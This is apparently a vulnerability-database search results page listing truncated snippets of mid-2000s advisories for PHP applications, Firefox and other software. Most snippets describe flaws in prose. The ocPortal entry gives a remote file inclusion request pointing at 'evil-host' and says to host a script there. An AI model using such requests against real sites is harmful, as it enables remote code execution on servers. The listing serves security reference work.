3245 matches found
PHP iCalendar Local File Inclusion
Binary data 3479.prm...
CVE-2006-0803
The signature verification functionality in the YaST Online Update YOU script handling relies on a gpg feature that is not intended for signature verification, which prevents YOU from detecting malicious scripts or code that do not pass the signature check when gpg 1.4.x is being used...
PhpGroupWare Calendar Server Side Script Execution Vulnerability
PhpGroupWare is prone to a remote attack. SPDX-FileCopyrightText: 2005 David Maciejak Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:phpgroupware:phpgroupware";...
phpCMS XSS
The remote host runs phpCMS, a content management system written in PHP. This version is vulnerable to cross-site scripting due to a lack of sanitization of user-supplied data in the parser.php script. SPDX-FileCopyrightText: 2004 David Maciejak Some text descriptions might be excerpted from a...
MAXdev MD-Pro 1.0.73 - Arbitrary File Upload
source: https://www.securityfocus.com/bid/14750/info MAXdev MD-Pro is prone to an arbitrary remote file upload vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. This issue is due to a design error in the application that uses a blacklist...
CPaint 1.3 - xmlhttp Request Input Validation
CPaint 1.3 - xmlhttp Request Input Validation source: https://www.securityfocus.com/bid/14577/info CPAINT is prone to an input validation vulnerability. This issue occurs because the application fails to properly sanitize malicious scripts and requests from user-supplied input. Successful...
ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload
ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload source: https://www.securityfocus.com/bid/14070/info ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability. Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly...
Sambar Server 5.x6.06.1 - Server Referer Cross-Site Scripting
Sambar Server 5.x6.06.1 - Server Referer Cross-Site Scripting source: https://www.securityfocus.com/bid/13722/info Sambar Server administrative interface does not adequately filter some HTML code thus making it prone to cross-site scripting attacks. It is possible for a remote attacker to create ...
GLSA-200504-24 : eGroupWare: XSS and SQL injection vulnerabilities
The remote host is affected by the vulnerability described in GLSA-200504-24 eGroupWare: XSS and SQL injection vulnerabilities Multiple SQL injection and cross-site scripting vulnerabilities have been found in several eGroupWare modules. Impact : An attacker could possibly use the SQL injection...
security flaw
Firefox before 1.0.3, Mozilla Suite before 1.7.7, and Netscape 7.2 allow remote attackers to replace existing search plugins with malicious ones using sidebar.addSearchEngine and the same filename as the target engine, which may not be displayed in the GUI, which could then be used to execute...
Arbitrary code execution from Firefox sidebar panel II — Mozilla
Sites can use the search target to open links in the Firefox sidebar. Two missing security checks allow malicious scripts to first open a privileged page such as about:config and then inject script using a javascript: url. This could be used to install malicious code or steal data without user...
firefox -- arbitrary code execution in sidebar panel
A Mozilla Foundation Security Advisory reports: Sites can use the search target to open links in the Firefox sidebar. Two missing security checks allow malicious scripts to first open a privileged page such as about:config and then inject script using a javascript: url. This could be used to...
ocPortal 1.0.3 Remote File Inclusion
Exploit for unknown platform in category web applications ==================================== ocPortal 1.0.3 Remote File Inclusion ==================================== http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put script funcs.php. Example of funcs.p...
GNU Info 4.7 - Follow XRef Buffer Overrun
source: https://www.securityfocus.com/bid/10882/info GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the f follow xref Info command. An attacker may exploit this...
Gallery 1.4.4 - Remote Server-Side Script Execution
source: https://www.securityfocus.com/bid/10968/info A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'settimelimit' function. The issue presents itself because...
JBrowser 1.02.x - Unauthorized Admin Access
JBrowser 1.02.x - Unauthorized Admin Access source: https://www.securityfocus.com/bid/9537/info Due to a lack of access validation to the 'admin' directory, malevolent users may be able to execute arbitrary admin scripts. This may allow a malicious user to upload arbitrary files to the affected...
PHPGedView 2.61 - Multiple Remote File Inclusions
source: https://www.securityfocus.com/bid/9368/info PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require paths for various external files. This will permit remote...
HotNews 0.x - hotnews-engine.inc.php3?config[header] Remote File Inclusion
HotNews 0.x - hotnews-engine.inc.php3?config[header] Remote File Inclusion source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included...
EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion
source: https://www.securityfocus.com/bid/9338/info EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attacker to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerab...
Multiple web-based email services fail to filter malicious characters when the message contains cascading style sheet character escaping
Overview: An attacker can send a specially crafted email message to a victim containing malicious scripting (JavaScript, VBScript, JScript, etc.), active content, or potentially HTML. When a victim views the message with scripting enabled, the victim's browser will then interpret this javascript whi...